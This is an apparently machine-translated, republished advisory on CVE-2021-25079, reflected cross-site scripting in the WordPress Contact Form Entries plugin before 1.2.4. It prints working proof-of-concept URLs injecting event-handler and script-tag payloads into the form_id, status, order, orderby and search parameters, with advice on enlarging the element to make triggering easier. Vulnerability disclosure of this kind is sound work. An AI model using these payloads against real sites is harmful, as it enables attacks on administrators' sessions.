当前位置:网站首页>WordPress contact form entries cross cross site scripting attack
WordPress contact form entries cross cross site scripting attack
2022-06-23 06:03:00 【Khan security team】
edition : < 1.2.4
CVE : CVE-2021-25079
Reference resources :
https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/
vxcf_leads Several parameters of the administrator page are vulnerable to reflection cross site scripting vulnerability .
GET /wp-admin/ admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+
Returns the list of saved entries in the database . form_id Value reflected in < form_id Parameters are not filtered , So you can inject any value .
http://example.com/wp-admin /admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+
Allow to inject... Into the input form onmouseover
<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>
By means of click Move the mouse inside the element , Vulnerability triggered . Even though the vulnerability seems to require the user to move the mouse over the input element , You can also inject a “ style ” Part to improve the attack , This section can extend input elements with large width and height . such , When the user clicks on the link , Will execute javascript Code . status Parameters are vulnerable to the most dangerous XSS attack : Just send the following request
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date
Will perform XSS Loophole . order、orderby and search Parameters are also susceptible to XSS attack :
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt
resolvent : Upgrade contact table entries to version 1.2.4
边栏推荐
- PAT 乙等 1026 程序运行时间
- Leetcode topic resolution divide two integers
- Analysis on the problems and causes of digital transformation of manufacturing industry
- True MySQL interview question (XXII) -- condition screening and grouping screening after table connection
- Memory analysis and memory leak detection
- How does win11 enable mobile hotspot? How to enable mobile hotspot in win11
- 【开源项目】excel导出lua配置表工具
- TCP/IP 详解(第 2 版) 笔记 / 3 链路层 / 3.4 网桥与交换机
- The author believes that the so-called industrial Internet is a process of deep integration of industry and the Internet
- Deploy docker and install MySQL in centos7
猜你喜欢

Adnroid activity截屏 保存显示到相册 View显示图片 动画消失

What is the magic of digital collections? Which reliable teams are currently developing

Activity startup mode and life cycle measurement results

HierarchyViewer工具找不到 HierarchyViewer位置

Deploy docker and install MySQL in centos7

雷达图canvas

Activity启动模式和生命周期实测结果

Addressing and addressing units

Advanced Mathematics (Seventh Edition) Tongji University exercises 1-8 personal solutions

A bit of knowledge - folding forging and Damascus steel
随机推荐
Pat class B 1010 C language
The construction of digital factory can be divided into three aspects
jvm-04.对象的内存布局
Real MySQL interview questions (25) -- common group comparison scenarios
True MySQL interview question (24) -- row column exchange
Real MySQL interview question (23) -- pinduoduo ball game analysis
Real MySQL interview questions (XXVI) -- didi 2020 written examination questions
Advanced Mathematics (Seventh Edition) Tongji University exercises 1-9 personal solutions
Pat class B 1015 C language
jvm-02. Guarantee of orderliness
Excel sheet column title for leetcode Title Resolution
jvm-01.指令重排
Analysis on the problems and causes of digital transformation of manufacturing industry
Pat class B 1025 reverse linked list
Heimdall database proxy scale out 20 times
Real MySQL interview questions (XXVII) -- Classification of users by RFM analysis method
编址和编址单位
雷达图canvas
Ant Usage Summary (III): batch packaging apk
PAT 乙等 1016 C语言